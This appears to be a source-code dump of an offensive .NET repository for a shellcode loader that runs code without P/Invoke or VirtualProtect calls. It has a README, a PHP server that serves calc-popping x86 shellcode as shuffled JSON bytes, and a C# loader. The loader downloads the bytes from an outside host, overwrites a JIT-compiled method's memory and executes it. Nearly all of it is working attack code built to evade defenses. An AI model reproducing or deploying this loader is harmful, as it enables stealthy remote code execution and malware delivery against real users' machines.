├── OffensiveX-2025.pdf
├── README.md
├── server.php
└── loader.cs


/OffensiveX-2025.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Mr-Un1k0d3r/DotnetNoVirtualProtectShellcodeLoader/HEAD/OffensiveX-2025.pdf


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # DotnetNoVirtualProtectShellcodeLoader
 2 | load shellcode without P/D Invoke and VirtualProtect call.
 3 | 
 4 | # How
 5 | 
 6 | This code leverages built-in .NET functionality to allocate an RWX memory region and overwrite a C# method with your own shellcode using the `RuntimeHelpers.PrepareMethod(handle)` method.
 7 | 
 8 | # Usage
 9 | 
10 | The POC is remotely fetching the shellcode on a remote server (a pop calc x86)
11 | 
12 | # Credit 
13 | 
14 | Mr.Un1k0d3r 2025
15 | 


--------------------------------------------------------------------------------
/server.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | header("Content-Type: application/json");
 3 | 
 4 | $data = "\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2\x52\xff\xd0";
 5 | $array = array(strlen($data));
 6 | for($i = 0; $i < strlen($data); $i++) {
 7 |         $array[$i] = array($i, $data[$i]);
 8 | }
 9 | shuffle($array);
10 | 
11 | ?>
12 | {
13 | <?php
14 | echo "\t\"items\": {";
15 | $output = "";
16 | for($i = 0; $i < strlen($data); $i++) {
17 |         $output .= '"' . $array[$i][0]. '": "' . ord($array[$i][1]) . '", ';
18 | }
19 | 
20 | echo substr($output, 0, strlen($output) - 2);
21 | echo "},\r\n";
22 | ?>
23 |         "code": 200
24 | }
25 | 


--------------------------------------------------------------------------------
/loader.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.IO;
 4 | using System.Net;
 5 | using System.Reflection;
 6 | using System.Runtime.CompilerServices;
 7 | using System.Security.Cryptography;
 8 | using System.Threading;
 9 | using System.Web.Script.Serialization;
10 | 
11 | public class APIDATA
12 | {
13 |     public Dictionary<string, string> items { get; set; }
14 |     public int code { get; set; }
15 | }
16 | public class Program
17 | {
18 |     private static byte[] shellcode;
19 | 
20 |     public static IntPtr GetMethodAddress(MethodInfo method)
21 |     {
22 |         RuntimeMethodHandle handle = method.MethodHandle;
23 |         RuntimeHelpers.PrepareMethod(handle);
24 |         return handle.GetFunctionPointer();
25 |     }
26 | 
27 |     public static void Dummy()
28 |     {
29 |         Console.WriteLine("Hello I'm a useless method");
30 |     }
31 |     static void Main(string[] args)
32 |     {
33 |         Program.Dummy();
34 | 		
35 | 		// the URL point to a dummy calc pop shellcode
36 | 		// the code is available in the repo under data.php
37 |         APIDATA data = GetApiResponse<APIDATA>("https://truecyber.world/data.php");
38 |         int size = data.items.Count;
39 |         Program.shellcode = new byte[size];
40 |         foreach(KeyValuePair<string, string> item in data.items)
41 |         {
42 |             Program.shellcode[Int32.Parse(item.Key)] = Byte.Parse(item.Value);
43 |         }
44 | 
45 |         MethodInfo mi = typeof(Program).GetMethod("Dummy", BindingFlags.Static | BindingFlags.Public);
46 |         IntPtr addr = GetMethodAddress(mi);
47 | 
48 |         unsafe
49 |         {
50 |             byte* ptr = (byte*)addr.ToPointer();
51 |             for (int i = 0; i < Program.shellcode.Length; i++)
52 |             {
53 |                 ptr[i] = Program.shellcode[i];
54 |             }
55 |         }
56 | 		
57 |         Program.Dummy();
58 |     }
59 | 
60 |     public static T GetApiResponse<T>(string url)
61 |     {
62 |         try
63 |         {
64 |             HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
65 |             request.Method = "GET";
66 |             request.Accept = "application/json";
67 | 
68 |             HttpWebResponse response = (HttpWebResponse)request.GetResponse();
69 |             using (StreamReader reader = new StreamReader(response.GetResponseStream()))
70 |             {
71 |                 string json = reader.ReadToEnd();
72 |                 JavaScriptSerializer serializer = new JavaScriptSerializer();
73 |                 T result = serializer.Deserialize<T>(json);
74 | 
75 |                 return result;
76 |             }
77 |         }
78 |         catch (Exception e)
79 |         {
80 |          
81 |         }
82 | 
83 |         return default(T);
84 |     }
85 | }
86 | 


--------------------------------------------------------------------------------